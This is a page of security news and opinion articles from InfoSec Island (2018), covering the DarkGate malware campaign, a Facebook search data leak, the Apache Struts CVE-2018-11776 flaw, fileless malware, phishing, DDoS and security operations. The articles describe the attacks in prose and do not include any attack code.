InfoSec Island

'DarkGate' Campaign Targets Europeans with Multiple Payloads

InfoSec Island - 2 hours 46 min ago

A newly discovered malware campaign is targeting users in Europe with various payloads, has a reactive command and control (C&C) system and can remotely control infected machines, enSilo security researchers warn.

Spreading through torrent files, the DarkGate malware can avoid detection by several anti-virus products and is also capable of detonating multiple payloads onto the infected machines, for crypto-currency mining, stealing crypto-coins, and encrypting victim’s files (ransomware).

The campaign operators use a C&C infrastructure cloaked in legitimate DNS records from services such as Akamai CDN and AWS, thus being able to avoid reputation-based detection. Their malware can bypass User Account Control (UAC) and can also evade elimination of critical files by several known recovery tools.

Mainly focused on targets in Spain and France, the campaign uses a reactive C&C infrastructure, where human operators react to notifications from infected machines. As soon as the malware reports back activity of interest on an infected machine, such as the presence of crypto wallets, the operators install a custom remote access tool for further operations.

The malware author invested a lot of time into ensuring the threat can evade detection by anti-virus products and continues to improve their creation. The operation appears financially motivated, but, given the threat’s ability to install remote access tools, the author might have other motives as well.

The security researchers were able to link DarkGate with the Golroted password stealer, as both use the Nt* API calls for process hollowing and a SilentCleanup schedule task for UAC bypass. Moreover, there are significant code overlaps between the two malware variants.

Distributed via torrent files, the DarkGate malware has a multi-stage unpacking process that starts with an obfuscated VBScript file functioning as a dropper for several files (saved to a hidden folder “C:\{username}”).

The malware uses process hollowing to inject and execute malicious code but, if the Kaspersky anti-virus is detected, the code is loaded as part of the shellcode. The final binary copies all files from “C:\{computer_name} “ to a new folder under “C:\Program data” and also installs a new key in the registry, to achieve persistence.

As part of the initial connection made to the C&C server, the malware gets the file necessary to start the cryptocurrency mining process. The malware can also search for and steal credentials for a variety of crypto wallets.

The threat contains six hard coded domains that it attempts to connect to upon infection. It also uses DNS records that are similar to legitimate DNS records from Akamai or Amazon, which allows it to avoid unwanted attention.

The malware also includes various anti-VM and user validation techniques, and also checks the infected system for a series of anti-virus products (informing the server on their presence, with the exception of Kaspersky, Trend Micro and IOBIt) and known recovery tools.

DarkGate, the researchers reveal, uses two distinct UAC bypass techniques in an attempt to elevate its privileges. One abuses a scheduled task for DiskCleanup (cleanmgr.exe), while the other one leverages Event Viewer (eventvwr.exe).

The threat can log keystrokes, and attempts to steal passwords from various programs, using the following applications: Mail PassView, WebBrowserPassView, ChromeCookiesView, IECookiesView, MZCookiesView, BrowsingHistoryView, and SkypeLogView.

DarkGate can delete all restore points on the system, and also appears capable of installing a RDP connection tool, thus providing operators with unfettered access to the infected machine. The server can request various information on the machine, such as locale, username, computer name, processor type, RAM, OS type and version, Epoch time, and installed AV type, among others.

Related: NSA Leak Fuels Rise in Hacking for Crypto Mining: Report

Copyright 2010 Respective Author at Infosec Island
Categories: InfoSec Island

Facebook Patches Bug that Exposed Private Information

InfoSec Island - Thu, 11/15/2018 - 1:46pm

Facebook recently addressed a vulnerability that could have allowed anyone to access private information about users and their contacts.

The vulnerability, Imperva security researcher Ron Masas explains, was found in Facebook’s online search function. He discovered that the HTML code for every search result contained an iframe element that could be exploited maliciously.

The issue is that the endpoint that expects a GET request with a number of search parameters is now cross-site request forgery (CSRF) protected. This allow users to share the search results page via a URL, but most users won’t take action, which makes it a non-issue.

When it comes to the Facebook online search, however, the problem is that the CSRF bug can be combined with the fact that iframes are exposed in part to cross-origin documents.

An attacker looking to abuse the vulnerability would need to trick a user into opening their malicious website and click anywhere there. The malicious site would only need to be running JavaScript.

The user interaction triggers a popup or a new tab to the Facebook search page, and the attacker forces the user to execute any search query they want.

“Since the number of iframe elements on the page reflects the number of search results, we can simply count them by accessing the fb.frames.length property. By manipulating Facebook’s graph search, it’s possible to craft search queries that reflect personal information about the user,” Masas explains.

The security researcher, who published a proof-of-concept video, notes that he was able to extract a variety of private user data by exploiting the issue.

Such information included details on whether the user had friends from Israel or friends named “Ron,” whether the user had taken photos in certain locations/countries, if they had Islamic friends or Islamic friends living in the UK, and even if the user or their friends wrote a post containing a specific text.

The process, the researcher explains, can be repeated without the need for a new popup or tab, as the attacker has control over the location property of the Facebook window through running a specific snippet of code.

“This is especially dangerous for mobile users, since the open tab can easily get lost in the background, allowing the attacker to extract the results for multiple queries, while the user is watching a video or reading an article on the attacker’s site,” the security researcher says.

The attacker doesn’t even need a Facebook account to extract said information, Imperva told SecurityWeek in an email. The security firm also said that Facebook, who was alerted on the bug in May, issued two bounties (mobile and desktop), for the total amount of $8,000.

Related: Facebook Says 50M User Accounts Affected by Security Breach

Related: Facebook Asks Big Banks to Share Customer Details

Copyright 2010 Respective Author at Infosec Island
Categories: InfoSec Island

A Human-Centered Approach to Building a Smart, Satisfied Information Security Team

InfoSec Island - Thu, 11/15/2018 - 8:27am

With limited personnel to manage the rising risk, the difficulty attracting, recruiting and retaining an appropriately skilled workforce has become a significant risk. 

Shortfalls in skills and capabilities are manifesting as major security incidents damage organizational performance and reputation. Building tomorrow’s security workforce is essential to address this challenge and deliver robust and long-term security for organizations in the digital age. Filling the skill shortage will require organizations to change their attitude and approach to hiring, training, and participating in collaborative pipeline development efforts. An overly rigid and traditional approach to identifying candidates, coupled with over-stressed and under-staffed work environments, is clearly in need of new tactics and fresh ideas.

Consider, for example, that new research by Cybersecurity Ventures finds that only 20% of the global cybersecurity workforce is comprised of women. On its face, this statistic proves that there are large, untapped pools of talent. Looking deeper, there are lessons to be learned about what organizations must do differently to attract bright prospects from a wider spectrum of education, experience, and expertise. And of course, it goes way beyond gender diversity — organizations must figure out how to recruit effectively from younger and older age groups, underprivileged districts, liberal arts colleges, and other atypical populations.

Organizations that fail to adopt a more creative approach will find themselves dangerously shorthanded in the next few years, as both attacks and defensive measures (e.g. security software platforms, patching and configuration practices, analytics, and machine learning) become more complex.

The Evolution of the Security Workforce

The security workforce, typically defined as the personnel responsible for an organization’s information security activities, has evolved rapidly since its inception. The information security function often exists only as part of another associated business function, such as: risk, technical IT operations, legal and or audit. It can be identified as information, cyber, assurance, or operational security. It can also report into various business units, including finance, risk, governance, or IT.

Over the course of its evolution, the lack of a consensus definition of the information security function has allowed numerous, disparate components to form an organization’s security workforce. For example, employees working within threat intelligence, business continuity, and security operations are all essential information security contributors, yet they rarely convene in one distinct function under a designated leader.

Supply and Demand

Closing the gap between supply and demand is imperative for an enterprise to develop an effective security posture. It is evident that individuals with the required skills, qualifications and experience are either unavailable or demanding compensation that cannot be met with existing budgets. Because they are in high demand, talented security staff regularly move to new employers as they seek out better salaries and projects at more prestigious companies.

But is this inevitable? Are hiring managers so inflexible in requiring candidates to have specific skills, qualifications, and years of experience that they end up hindering their security teams? Are uninformed and unimaginative recruitment practices contributing significantly to the perceived shortage? As salaries escalate, organizations are urgently seeking a solution to the perceived crisis around hiring information security professionals.

To address the growing demand, organizations should broaden their approach, and work purposefully to recruit security professionals from a diversity of backgrounds, disciplines and skill sets. Focus on the aptitude and attitude of candidates rather than insisting on a host of specific skills, experience and qualifications that would eliminate a large portion of current and prospective information security professionals.

Human-Centric Security

As vendors and tools saturate the market of security solutions, potential employees have come to perceive information security as deeply technical, leaving recruiters struggling to identify and appeal to candidates with a less traditional mix of education and experience. Organizations are swiftly recognizing that bright, diligent, inquisitive individuals are among the most valuable security assets an enterprise can leverage. A human-centric approach to information security will foster a workforce that is capable of meeting the challenges presented by digital risk.

To help achieve a human-centric approach, the information security function should collaborate with HR and take advantage of well-established HR practices to build a diverse workforce of capable individuals. A human-centric approach supported by HR provides the structure for a strong workplace culture characterized by proficient and satisfied information security professionals.

Building a Sustainable Security Workforce

Increasing reliance on digital systems, coupled with a dynamic threat landscape, has made the security workforce core to an organization’s survival. But for many enterprises, developing a sustainable security workforce is only an aspiration: attracting and retaining experienced, certified security experts is a constant battle.

Organizations need to establish a series of strategic objectives that lay a foundation for a stronger workforce and more robust pipeline. With clear direction and sustained HR efforts, organizations can formalize the structure of the security workforce, harness the appropriate talent, and bring security teams into better alignment with the organization’s security objectives.

As the security workforce matures and finds innovative ways to embrace the vast resources of untapped talent, the exaggerated myth of a looming crisis in the global security workforce. A robust and diverse security workforce will empower organizations to face future workforce challenges, such as automation, role and function amalgamation, and increased outsourcing. ISF Members are already demonstrating success at cultivating teams with the necessary skills and expertise in progressive and engaging environments.

A sustainable security workforce is essential if the information security function is to become a partner to the business and effectively manage the increasing cyber risk and security burden.

About the author: Steve Durbin is Managing Director of the Information Security Forum (ISF). His main areas of focus include strategy, information technology, cyber security and the emerging security threat landscape across both the corporate and personal environments. Previously, he was senior vice president at Gartner.

Copyright 2010 Respective Author at Infosec Island
Categories: InfoSec Island

Addressing the CISO’s Key Challenges in 2018 and Beyond with Endpoint Detection and Response

InfoSec Island - Mon, 11/12/2018 - 10:17am

IT security leaders face more hurdles today than ever. From the growing threat landscape to the increasing regulation of the digital economy, information security officers have their work cut out for them.

Research indicates that CISO responsibilities are growing faster than their ability to address security issues. Some of their biggest troubles include evolving threats, tight budgets, lack of skilled staff, complex environments to protect, and even more complex solutions that do little to ease the IT department’s load. Coupled with the increasing compliance burdens of GDPR and other regulations like it, CISOs need to meet their responsibilities by working smarter, not harder. One such smart approach includes leveraging effective Endpoint Detection and Response (EDR.)

While there is no shortage of EDR solutions, an evaluation of efficacy among top providers shows these solutions vary widely. But why? Most EDR solutions are: too complex and noisy, they trigger too many false alarms (alert fatigue), offer little to no visibility into the detection and remediation process, and/or lack analytics to automate core processes.

An effective EDR solution should reduce alert fatigue by limiting the number of incidents requiring human analysis, enabling IT departments to focus security resources on real threats, and should never overburden staff or infrastructure resources.

Moreover, IT departments need a security solution that is operationally effective. Instead of piling on disparate solutions from different vendors and achieving inferior results, organizations today have access to technologies that give them the option to deploy a single-agent, single-console solution that greatly reduces the effort to install and manage endpoint security.

An integrated, full-spectrum solution

Combating modern threats requires modern weapons. Traditional security solutions are no longer enough—they only display a warning that a threat was blocked, end of story. They offer no visibility into what happened before, during, and after the attack. This lack of insight does little to prepare security teams for similar attacks in the future.

What IT departments need is integrated EDR and EPP (endpoint protection platform), which offers both protection and visibility across all malicious/suspicious activities throughout the infrastructure, as well as alert triage to let them focus on real threats. This integrated solution also offers effective incident response workflows that help reduce resource requirements.

A proper EDR implementation augments protection, detection and response by working together with the security solution in order to provide a complete picture of how threats target organizations, while also allowing IT and security teams to focus on relevant security incidents. At the same time, a successful EDR/EPP implementation eliminates the need for multiple agents, as everything is delivered under a single solution, manageable from a single centralized console. This simplifies deployment and operations across all enterprise endpoints and operating systems, in complex infrastructures both physical and virtual, and across data centers and public cloud environments.

Furthermore, integrated EDR and EPP provides stack and on-execution detection capabilities, which prevents and stops advanced threats from being executed on enterprise infrastructure, while also helping IT and security teams with forensics and investigations into potential security incidents.

The Best of Both Worlds – Security, Visibility

The evolution of cyberattacks has made anomaly detection an imperative and integral part of EDR. Leveraging Machine Learning, EDR solutions can offer suspicious activity detection that helps with investigation and response, by performing fast security alert triage and focusing on truly relevant security events, usually associated with potential breaches and cyberattacks. Once a potential threat is detected, automatic response kicks-in, enabled by the integrated EPP solution, blocking lateral movement, killing suspicious or malicious processes, and automatically remediating any malicious changes performed by the threat. Finally, pre- and post-compromise forensics, offer by EDR capabilities, provide visibility into past actions covering the entire lifecycle of the attack and creating a full picture of the attacker’s objective.

Keeping imminent cyber threats at bay may sound complicated, but it really boils down to just a few key aspects: reducing the attack surface, automating detection and response, gaining insight to mitigate future threats, and avoiding loss of business by rapidly containing and remediating an attack.

Today more than ever, incident response teams need to be given the tools to analyze and investigate suspicious activities, and adequately respond to evolving threats.

About the author: Liviu Arsene is a Senior E-Threat analyst for Bitdefender, with a strong background in security and technology. Reporting on global trends and developments in computer security, he writes about malware outbreaks and security incidents while coordinating with technical and research departments.

Copyright 2010 Respective Author at Infosec Island
Categories: InfoSec Island

Fight Fileless Malware on All Fronts

InfoSec Island - Tue, 11/06/2018 - 9:44am

Take a unified approach: patch and protect all elements of your ecosystem to prevent new attacks.

The Ponemon Institute estimates that more than half of all attacks against businesses in 2017 were fileless. Cyber criminals continue to find new, creative ways to disrupt organizations, and a new favorite that gained traction last year is fileless malware. No doubt, 2018 statistics, when compiled, will indicate fileless malware is among the prevalent attacks as cyber attackers exploit capabilities in Microsoft’s Power Shell, Windows Management Instrumentation (WMI) and MacOS Shell.

Cyber Criminals Love Fileless

The recent trend of fileless malware is part of a larger cybercrime story, that of attackers using a variety of scripts to introduce malware or command and control capabilities into an enterprise. PowerShell, for example, is mainly used to automate administration tasks, including managing configurations of systems and servers. It has been exploited by scripting malware families like W97/Downloader, Kovter fileless malware, Nemucod and other JavaScript downloaders.

One of the latest examples of fileless malware and script attacks was the heist of close to $1 million from a Russian bank. The cyber criminal group, known as MoneyTaker, is believed to have conducted more than 20 successful attacks on financial institutions and legal firms in Russia, the UK and the U.S. Researchers estimate a total figure of $14 million, from 16 U.S. targets, five Russian banks and one hack of a UK banking-software firm. As reported, the group used widely available tools including PowerShell, Visual Basic and the Metasploit exploit framework, plus their own custom-made fileless malware, to hack into these networks.

Why Fileless Works so Well

Fileless malware has become the darling of cyber criminals because, quite simply, it’s a no-brainer. Rather than wait for some human to open a phishing email or inadequately encrypted application, fileless malware works on what is already in your network, i.e., the day-to-day scripts enterprises use, like PowerShell, VBScript or JavaScript. It is easier to conduct an exploit and harder to detect. The malware can be executed entirely from the command line and with capabilities such as executing commands written in base 64 encoding, it may be very difficult to see the malware running. Fileless malware typically does not require downloading additional malicious files – the hacker simply executes a command with arguments on the command line. These commands however, are capable of stealing data and credentials, spying on IT environments, and leaving back doors open to further exploits. Another tactic is to exploit in-memory access and running applications, such as web browsers and Office applications to conduct malicious behavior.

A fileless infection could be malicious code or data that exists only in memory. It isn’t installed to the target computer’s hard drive. Written directly to RAM, the code is injected into a running process where it can be used for the exploit. And, since it doesn’t exist as a true file, it can often go undetected by antivirus software and intrusion prevention systems. This “zero footprint” intrusion leverages legitimate programs and data to perform desired tasks, while remaining nearly undetectable using traditional detection methods. The infection can remain live until the system is rebooted and the fileless malware is purged from the infected system’s memory, enabling attackers to steal data or download more persistent malware to use in future attacks.

Fighting Back against Fileless

Fileless malware is particularly insidious since traditional antivirus solutions simply aren’t enough of a defense. It has prompted security teams to take a multi-faceted approach to detecting threats and preventing new attacks. ‘Threat hunting’ includes actions such as log analysis of all network devices to detect threat activity like unusual domain name system (DNS) requests or suspicious registry of system file changes; establishing a baseline of approved network traffic; examining behavioral attributes of network users, and understanding baseline endpoint activity of applications and users to detect suspicious activity.

How can fileless malware be avoided? Really, the short answer is, in light of the increasing popularity of these attacks, you need to do it all – to take a unified approach, looking across your enterprise and executing threat-prevention practices wherever possible.

Here are recommended practices for a unified IT approach to fighting back against fileless malware:

  1. Patch Management is critical to preventing attacks of all kind. Make sure your endpoints and servers are contained in the patch cycle to optimize threat protection. And make those Microsoft patches in a timely fashion! For example, the Microsoft August patch list contained two zero-day vulnerabilities:  CVE-2018-8373 [Internet Explorer] and CVE-2018-8414 [Windows Shell]. Given there are known exploits, you should give these fixes top priority.
  2. Advanced Application Control prevents malicious software as well as scripts from executing. By restricting unnecessary scripting languages, you can limit the frameworks that can be used to secretly execute commands on the host system.
  3. Disable Macros and apply memory protection techniques. If you can’t disable macros, consider applying technology to digitally sign macros that are authorized for use by the organization.
  4. Most Advanced Antivirus Technology gives you the most powerful means of addressing the threat at the kernel level.
  5. Privilege Management is essential to limiting threats by giving users the exact level of rights they need to get their job done, and nothing beyond that. Following strict privilege practices helps ensure user credentials – if compromised – don’t allow cyber criminals access to OS tools that will introduce a fileless infection.
  6. Isolation Policies are also effective against fileless attacks. They can limit the reach of any fileless malware intrusion.
  7. Insight Tools can afford a better view into your most vulnerable systems, using techniques such as Web Application Firewalls (WAFs) to protect potentially exposed systems.
  8. Enforce Policies on removable devices. Locking down user devices, such as flash drives, can further prevent fileless malware exposure.

What’s Next?

“The time it takes cybercriminals to compromise a system is often just a matter of minutes—or even seconds. They don’t need much time to extract valuable data—they usually have much more than they need as it typically takes organizations weeks or months to discover a breach.” A cautionary note from Verizon’s 2018 Data Breach Investigations Report. Verizon reported that 68% of the breaches took months or longer to discover, and to add to the deficit, many breaches are discovered by customers, damaging a company’s brand reputation.

The MoneyTaker group was reported to have spent months investigating a target’s network, in order to elevate system privileges to those of a domain administrator, then to remain active inside the network following the heist.

The message here is: taking a unified approach – enforcing every possible security policy to prevent these attacks and exercising constant vigilance - is the only way to fight back against fileless malware!

About the author: Phil Richards is the Chief Information Security Officer (CISO) for Ivanti. Prior to Ivanti he has held other senior security positions including the Director of Operational Security for Varian Medical Systems, Chief Security Officer for Fundtech Corporation and Business Security Director for Fidelity Investments.

Copyright 2010 Respective Author at Infosec Island
Categories: InfoSec Island

How to Protect SMBs Against Phishing Attacks via Social Engineering

InfoSec Island - Tue, 11/06/2018 - 8:23am

Social engineering and artificial intelligence (AI) are bringing about a new golden age of hacking for criminals. They are capitalizing on common online habits of everyday people to tempt them to click on or install harmful applications – in the guise of browser extensions, clickbait and more – each specifically targeted to the individual user’s online habits using AI.

Most breaches occur when employees make common, seemingly harmless mistakes. Now, this goes beyond forgetting to install updates or using overly simple passwords.  In fact, due in part to the rise of social engineering, employee mistakes account for the vast majority of breaches. Hackers are catching on fast, capitalizing on human nature and using AI and social engineering to target unsuspecting employees. Clickbait isn’t just about articles and pageviews – it’s about getting a backdoor into your network through unsuspecting employees.

These increasingly sophisticated attacks might look like a harmless browser extension or an article in a social media feed. Employees will likely assume they are legitimate (haven’t we all downloaded a music app or other favorite tool?). Unfortunately, behind these many commonly installed applications, lurks a more sinister motive: a hidden phishing device.

Varying Risk Factors

While training may be effective, it is unlikely to stop all employees from putting themselves unwittingly at-risk (particularly on their mobile devices over work networks). Small to medium businesses are especially vulnerable when it comes to these highly sophisticated attacks, so what do they need to know to safeguard against these threats?

First, organizations need to understand the types of phishing attacks. Spear phishing, for example, is a phishing attack targeted at specific individuals and can present a substantial risk to organizations. Spear phishing attacks pinpoint persons in the company with access to sensitive and/or valuable data. This could be anyone from a sales executive to an engineer on a specific project to the chief financial officer. While most phishing attacks broadly target employees with the hopes of catching just one, spear phishing is intended to focus on extracting data or credentials from specific individuals. We are seeing this increasingly as hackers become more aware of the value of specific targets and go after them.

Next, organizations need to understand basic prevention techniques. Phishing requires constant training, since humans are the targets, rather than computer systems. Phishing works because someone takes an action to provide access to cybercriminals, unlike other types of attacks. This element of social engineering requires organizations to train employees not once, but on a recurring basis. Many organizations are seeking hands-on training through simulations after finding that prior measures weren’t effective. Training employees how to inspect email header information and identify malicious “spoof” websites can help safeguard organizations against many common threats.

Mobile Devices in the Workplace

Mobile devices are increasingly becoming the vector through which hackers target employee networks. According to a recent report, the rate at which users are falling for attacks on mobile devices has increased 85 percent each year since 2011. Mobile devices are growing in popularity for attacks because they often lack endpoint security and have access to a wide variety of mobile applications and messaging services. This provides more opportunities for hackers to target employees, who may assume their personal device isn’t a threat to their employer’s network. New attacks use popular apps such as WhatsApp and Facebook to lure victims to download malware, which can expose data stored on these devices.

Having a bring-your-own-device (BYOD) policy is not without risks.  For example, the device may be taken to offsite for personal use where it could easily be exposed to unknown Wi-Fi networks, shared with family and friends, or have any number of personal applications on it. Additionally, devices, especially mobile phones and tablets, can easily be lost. If the device contains sensitive business information, or can connect to a corporate network to access such data, these behaviors seriously increase the risk of compromising company data.

Training Isn’t Always Enough

When the best training isn’t enough, SMBs should put technology in place to back up these efforts. People are human, and as such, they will often make judgement calls that may put them at risk despite the best intentions and training. To supplement training, technology that can identify threats where people might not even think to look is critical. A layered security approach that combines the use of technology, policy and training will be the most effective. Solutions like next-generation firewalls, endpoint protection, behavioral heuristics and more should all be explored when architecting the right strategy for your organization.

Ultimately, phishing attacks rely on social engineering, with the goal of putting something in front of an employee that will entice them to click (or download) without thinking about the consequences.

Attackers are constantly changing tactics, so ensuring that you are armed against the latest threats is critical. Look for solutions that automatically update in addition to training your employees at regular intervals to understand the latest threats. Creating a culture of security awareness is an important first step for any organization. 

About the author: Timur Kovalev serves as the CTO at Untangle and is responsible for driving technology innovation and integration of gateway, endpoint, and cloud technologies. Timur brings over 20 years of experience across various technology stacks and applications.

Copyright 2010 Respective Author at Infosec Island
Categories: InfoSec Island

DDoS Disruption: Election Attacks

InfoSec Island - Mon, 11/05/2018 - 11:08am

In an increasingly politically and economically volatile landscape, cybercrime has become the new geopolitical tool. Attacks on political websites and critical national infrastructure services are ever more frequent not only because the tools to do these are simpler, cheaper and more widely available, but also due to desire and capabilities of attackers to impact real-world events such as election processes, while staying undiscovered. Not surprisingly, a third of respondents to NETSCOUT’s latest Worldwide Infrastructure Security Report saw political or ideological disputes as motivation for DDoS attacks.

As such, we are reminded that cyberattacks against elections are a major concern for the US—recall the recent DDoS attack that crashed a Tennessee county's website on election night in May. The Department of Homeland Security has warned against voting machine hacks and targeted attacks against campaigns. The agency said that in 2016, hackers targeted election systems in 21 states.

Election officials are on high alert for future DDoS attacks and the risk they pose to availability of systems, and more importantly, to confidence in the entire system, which hangs in the balance as we consider the integrity, sanctity and validity of election results overall. Moreover, DDoS attacks on election night pose risk to the availability of information. Imagine if the AP suffered an outage due to a DDoS attack on election night?

The Risk of Volumetric Attack

The sudden emergence of MemcacheD as an attack vector earlier this year certainly brings the possibility of a massive DDoS attack into focus for election officials. The reality is that while 2018 has ushered in an era of terabit DDoS attacks, with the largest one clocking in at 1.7Tbps, we’ve seen evidence that it will also prove to be a year faced with application-layer attacks as well.

Unlike volumetric attacks, which overwhelm networks quickly by consuming high levels of bandwidth, application-layer attacks are more subtle and insidious – and much more difficult to detect and block. The application-layer attack, sometimes called a Layer 7 attack, targets the top layer of the OSI model, which supports application and end-user processes. In these outbreaks, attackers pose as legitimate application users, targeting specific resources and services with repeated application requests that gradually increase in volume, eventually exhausting the ability of the resource to respond. Widely regarded as the deadliest kind of DDoS attack and often fueled by botnets such as Mirai and it’s many successors, application-layer attacks can inflict significant damage with a much lower volume of traffic than a typical volumetric attack, making them difficult to detect and mitigate proactively with traditional ISP or cloud-based monitoring solutions. They have a singular goal: take out a website, application or online service. While service providers can detect and block volumetric attacks as well as larger application-layer attacks, smaller application attacks can easily escape detection in the large ISP backbone, while still being large enough to cause a problem for the enterprise network or data center.

Domain name system servers (DNS), the directories that route internet traffic to specific IP addresses, are the most common targets, and HTTP and secure HTTPS services are also targeted frequently, rendering them unavailable to legitimate requests. In fact, many business-critical applications are built on top of HTTP or HTTPS, making them vulnerable to this form of attack even though they may not look like traditional public web-based applications.

Best Practice DDoS Defense

To effectively detect and mitigate this type of attack in real time, what’s needed is an inline, always-on solution deployed on-premise as part of a best-practice, hybrid DDoS defense strategy combining cloud-based and on-premise mitigation. An intelligent on-premise system will have the visibility and capacity to quickly detect and mitigate these stealthy, low-bandwidth attacks on its own, and early enough to avoid the need for cloud mitigation. Should the attack turn into a flood, the on-premise system can instantly activate cloud-based defenses through cloud signaling. Deploying any widely available on-premise component of a hybrid DDoS defense solution, including those from NETSCOUT, can mitigate the vast majority of application-layer attacks before they can do damage. For organizations facing budget and resource constraints, managed DDoS service options provide them with a means to save money, amplify in-house resources and reduce risk. Outsourced or in-house, a hybrid DDoS defense ensures detection and mitigation across the full spectrum of DDoS risks while protecting availability.

About the author: Hardik Modi is Senior Director, Threat Intelligence at NETSCOUT|Arbor. He is responsible for the Threat Research and Collections teams, ASERT and ATLAS, respectively. In this role, he drives the creation of security content for NETSCOUTs products, enabling best-in-class protection for users, as well as the continuous delivery and publication of impactful research across the DDoS and Intrusion landscapes.

Copyright 2010 Respective Author at Infosec Island
Categories: InfoSec Island

Buy, Rent, or Uber Your Security Operations Center

InfoSec Island - Mon, 11/05/2018 - 5:08am

We all know that data breaches cost a lot—an average of $3.6M per organization.

For cyber criminals, everyone’s a target—and perfect prevention isn’t practical. We must assume that, at some point, every organization’s IT infrastructure will be breached. That’s why we need to continuously monitor, investigate and respond to cyber threats 24/365 if we are to avoid costly breaches and the potential impact to reputation, revenue and customer confidence.

What better way to provide continuous monitoring and analysis than through a security operations center (SOC)? With the people, processes and platform to continuously look across the entire organization’s networks, servers, endpoints, applications and databases, a SOC applies expert knowledge to detect and dig into potential threats. One of the key benefits of a SOC is preventing the devastating impact of a breach by reducing the dwell time (the time between when an attacker compromises a network—minutes—and when the organization discovers the threat—typically months!)

Cost and complexity are roadblocks

Any way you look at it, a SOC is complex and expensive. It requires a lot of specialized hardware and software to generate events and alerts, which must be examined by highly skilled security analysts who can determine which ones represent real threats.

The platform is costly.

You need a well-tuned SIEM (security information and event management) to provide the visibility foundation, along with firewalls, IPS/IDS, vulnerability assessment tools, endpoint monitoring solutions and more. All of this must be fed by threat intelligence that is specific to your organization’s goals and risk tolerance, and the results need to be augmented by machine learning and fine-tuned by human experts.

Processes are costly as well.

Detailed organization-specific playbooks need to be written, spelling out what should happen when ransomware, malware infections, distributed denial of service attacks or other threats are seen. They specify how to investigate, what evidence to gather and when and how to escalate.

Perhaps the most expensive component is people.

It’s difficult enough to hire a team of highly skilled security analysts with the bandwidth and expertise to perform continuous monitoring, while we are experiencing a worldwide shortage. It’s even harder to retain them in the face of stiff competition for scarce talent.

The Complete SOC: Platform. People. Process.

Finding the best route

Reaching the goal of continuous coverage is not a simple make/buy decision: it’s more of a buy/rent/co-manage decision: should you build your own SOC, outsource your SIEM (or SOC) platform, or leverage a co-managed SOC solution.

1. Building your own SOC is akin to buying a car to get from Point A to Point B.

You incur all the platform, process and people costs – but you are in total control over where you are going and how to get there (i.e. what your organization sees as risks, threats, and responses). Of course, the cost and complexity could be prohibitive.

2. Outsourcing your SIEM or SOC platform is like renting a car.

You don’t have to make the capital outlay for hardware, but you still need to carry out all the processes—and you must hire, train and retain your own SOC team. It’s less expensive than building your own SOC, but still quite pricy.

3. Leveraging a co-managed SOC solution is like using Uber to get to your destination.

You augment your own internal team with seasoned security experts with mature processes driving a powerful SIEM platform, yet you remain in control of the ultimate destination. A co-managed SOC ensures that the collective team is operating in concert to reach your organization-specific goals.

Uber your way to a SOC

The goal is to get from Point A (your organization’s current security and compliance posture) to Point B (stronger security posture, compliance confidence and incident readiness). Clearly, the most cost-effective way to reach that goal is via a co-managed SOC – the Uber approach. You get the best of both worlds: the best people, processes and platform, at the lowest cost. Not only do you avoid the people and process costs, you retain control over the aspects that are specific to your organization: your risk tolerance, your market realities and your definition of what’s most important to you.

About the author: A. N. Ananth is a co-founder and CEO of EventTracker, Ananth was one of the architects of the EventTracker SIEM solution. With an extensive background in product development and operations for telecom network management, he has consulted for many companies on their compliance strategy, audit policy and automated reporting processes.

Copyright 2010 Respective Author at Infosec Island
Categories: InfoSec Island

What You Need to Know about the Recent Apache Struts Vulnerability

InfoSec Island - Mon, 11/05/2018 - 4:55am

Researchers recently revealed a vulnerability in Apache Struts, a popular type of enterprise software. Active exploit attempts weren’t far behind.

The Equifax hack that occurred roughly a year ago was due to an earlier Apache Struts vulnerability (CVE-2017-9805). The team at Equifax was aware of the vulnerability but took some time to patch it — and in this gap the company was hacked, and the data of millions was stolen.

To avoid falling victim to a similar attack, it’s important for businesses and their IT service providers to understand the recently revealed CVE-2018-11776 Apache Struts vulnerability and how to guard against it. This is a command injection vulnerability in the Apache Struts framework. When you run the vulnerable version and have a specific vulnerable configuration, an attacker can perform remote code execution and breach the web application.

The specific vulnerability is exploitable when:

  • An action is configured to use no namespace or a wildcard namespace
  • The “struts.mapper.alwaysSelectFullNamespace” configuration is set to “true”

Struts uses OGNL (Object-Graph Navigation Language), an expression language to perform data transfer and type conversion. In the case where there is a wildcard namespace, Struts will take the user-defined namespace and in some cases, execute it as an OGNL expression. This means that an attacker can send specific commands that end up being executed when OGNL evaluates it.

An attacker can use this vulnerability to execute any type of commands on the hacked server. They could attempt to steal live payment information, install cryptominers or other software, hold the server to ransom, perform attacks using the server as a starting point, or simply delete all the data on the server.

Sharp Increase in Exploitation Attempts

Web application attacks are extremely common today — and they are increasingly weaponized using automated bots. Our honeypots detected a surge in exploitation attempts of the older Apache vulnerability immediately after the current vulnerability was announced. Since then, we’ve seen the level of activity remain high.

News has come out that the Mirai botnet has been repurposed to perform these exploitation attempts at a massive scale using infected IoT devices. It has been found that some versions of Mirai are attempting to exploit multiple different vulnerabilities to gain access to and control web servers.

When it comes to web application attacks, much more than the web application is at risk. Attackers can also use the web application as a staging area to gain further access to the network and access other critical resources. This means that any web application — no matter how small it is — should be patched and kept up to date at all times. However, patching a web application can take time. Between testing the patch to ensure that it does not break core functionality, finding sysadmin resources, and getting approvals for any required downtime, an application can remain unpatched for weeks or months. Having the right web application firewall in place can provide complete protection during this time by blocking known attacks and zero-day attacks. This provides you with valuable air cover while you get ready to fix the vulnerability on your web servers.

How a WAF Can Protect Against Other Attacks

A WAF should provide complete application protection, including against attacks most people don’t consider — like application distributed denial of service (DDoS), brute force attacks, and web scraping.

Application DDoS attacks are the subtle siblings of volumetric DDoS attacks. They fly under the radar by performing low and slow attacks against a web server, tying up its resources and bringing down an application. A typical example is multiple concurrent downloads of a large file, very slowly. A WAF can detect and block all kinds of application DDoS attacks.

Other types of automated attacks that occur often are brute force attacks — where hackers attempt to brute force login to applications — and web scraping. Web scraping is a large problem today; bots masquerading as valid users attempt to steal content and competitive information from web application for profit. A good WAF should have a powerful bot mitigation engine to detect and block bots with ease.

Multiple Layers of Protection for the Win

Organizations need to implement a multi-layered approach to ensure complete defense of their network. Defense in depth requires these layers to work in unison to defeat the various attacks against a network. This includes Advanced DDoS Protection to block volumetric attacks, cloud-generation firewalls to secure your network perimeter, and a WAF that combines web and API security along with secure application delivery in a single platform. All these layers work together to protect your applications and provide you with valuable air cover against today’s evolving threat landscape.

About the author: Tushar Richabadas is product manager for the Barracuda CloudGen WAF product line. His specific areas of focus are application security in the cloud, automation, and bot mitigation.

Copyright 2010 Respective Author at Infosec Island
Categories: InfoSec Island